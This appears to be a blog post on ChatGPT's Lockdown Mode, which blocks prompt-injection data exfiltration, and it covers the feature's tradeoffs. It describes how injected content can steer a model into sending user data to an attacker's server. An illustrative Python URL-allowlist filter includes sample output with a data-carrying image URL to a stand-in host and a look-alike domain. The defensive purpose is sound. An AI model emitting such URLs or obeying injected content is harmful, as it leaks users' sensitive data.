OpenAI just rolled out Lockdown Mode for ChatGPT, a new security setting designed to shut down one of the most dangerous attack vectors in AI: prompt injection-based data exfiltration. It’s available now for all personal accounts — Free through Pro — and self-serve Business plans.
What Lockdown Mode Actually Blocks
The feature targets the final stage of a prompt injection attack, where an attacker tricks ChatGPT into sending sensitive data to an external server. Lockdown Mode combines sandboxing, URL-based exfiltration protections, monitoring, and enforcement at the model, product, and system levels. It doesn’t prevent prompt injections from happening — malicious content can still influence the model’s responses — but it cuts off the outbound network requests that would carry your data to an attacker.
That’s a meaningful distinction. The injection itself might still work, but the stolen data hits a wall before it leaves OpenAI’s environment.
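To make that distinction concrete, here is an added example (not OpenAI's code, and not a description of how Lockdown Mode is implemented) of the general idea of a URL egress check applied to model output. The allowlisted hosts, the `filter_output` helper and the sample text are all assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this hypothetical deployment will fetch from or render.
ALLOWED_HOSTS = {"docs.example.com", "cdn.example.com"}

# Matches http(s) URLs in model output, including markdown link/image targets.
URL_RE = re.compile(r"https?://[^\s)\]>\"']+")

def is_allowed(url: str) -> bool:
    """Allow only https URLs whose exact hostname is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:          # malformed URL: fail closed
        return False
    host = (parts.hostname or "").lower()
    # Exact match, not substring or prefix match, so look-alike hosts fail.
    return parts.scheme == "https" and host in ALLOWED_HOSTS

def filter_output(text: str):
    """Replace non-allowlisted URLs; return (clean_text, blocked_urls)."""
    blocked = []
    def _sub(match):
        url = match.group(0)
        if is_allowed(url):
            return url
        blocked.append(url)     # keep for monitoring and alerting
        return "[blocked-url]"
    return URL_RE.sub(_sub, text), blocked

# Constructed sample: output produced after an injection has already
# influenced the model. The first URL carries data in its query string,
# the third imitates an allowlisted host by using it as a prefix.
SAMPLE = (
    "Here is the summary you asked for.\n"
    "![status](https://collector.invalid/p.png?d=ACME-Q3-forecast)\n"
    "Reference: https://docs.example.com/guide\n"
    "Mirror: https://docs.example.com.collector.invalid/guide\n"
)

if __name__ == "__main__":
    clean, blocked = filter_output(SAMPLE)
    print(clean)
    print("blocked:", blocked)
```

The injected instructions still shaped the response, but the two URLs that would have carried data off-platform never reach a renderer or fetcher, and the blocked list gives monitoring something to alert on.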
The Tradeoffs Are Real
Enabling Lockdown Mode comes with significant capability restrictions. Web browsing is limited to cached content, so search results may be outdated or unavailable. Deep Research and Agent Mode are completely disabled. ChatGPT can’t download files for data analysis — only manually uploaded files work. Canvas-generated code that requires network access can’t be approved.
For connectors and third-party apps, live access and write actions are blocked on personal accounts. Features like Finances in ChatGPT and shopping-agent experiences become unavailable. In managed workspaces, admins control app and connector access through role-based permissions, and OpenAI recommends reviewing each app’s exfiltration risk before enabling it for Lockdown Mode users.
Who Is This For?
OpenAI is clear that this isn’t meant for everyone. It’s built for people and organizations handling sensitive data — think legal teams, healthcare workers, financial analysts, or anyone pasting proprietary information into ChatGPT regularly. If you’re using ChatGPT for casual browsing and creative writing, the restrictions probably aren’t worth it.
But for security-conscious teams already using ChatGPT Business, this is a genuine step forward. The Compliance API Logs Platform provides visibility into app usage and shared data, giving admins the audit trail they need.
The Bigger Picture
Prompt injection has been the Achilles’ heel of AI assistants since day one. Every connector, every web browsing capability, every file download feature is a potential exfiltration path. OpenAI’s approach here is pragmatic: instead of claiming to prevent injection, they’re focusing on blocking the data from leaving. That’s honest, and it’s effective.
The real question is whether competitors like Google and Anthropic will follow suit with similar features. As AI agents become more deeply integrated into enterprise workflows, “lockdown” capabilities will stop being optional extras and start being baseline requirements.
What to Do
If you handle sensitive data in ChatGPT, enable Lockdown Mode and test your workflows before committing to it. Workspace admins should audit connector permissions and review which apps team members actually need. And keep an eye on OpenAI’s documentation — they’re clearly iterating fast on this.
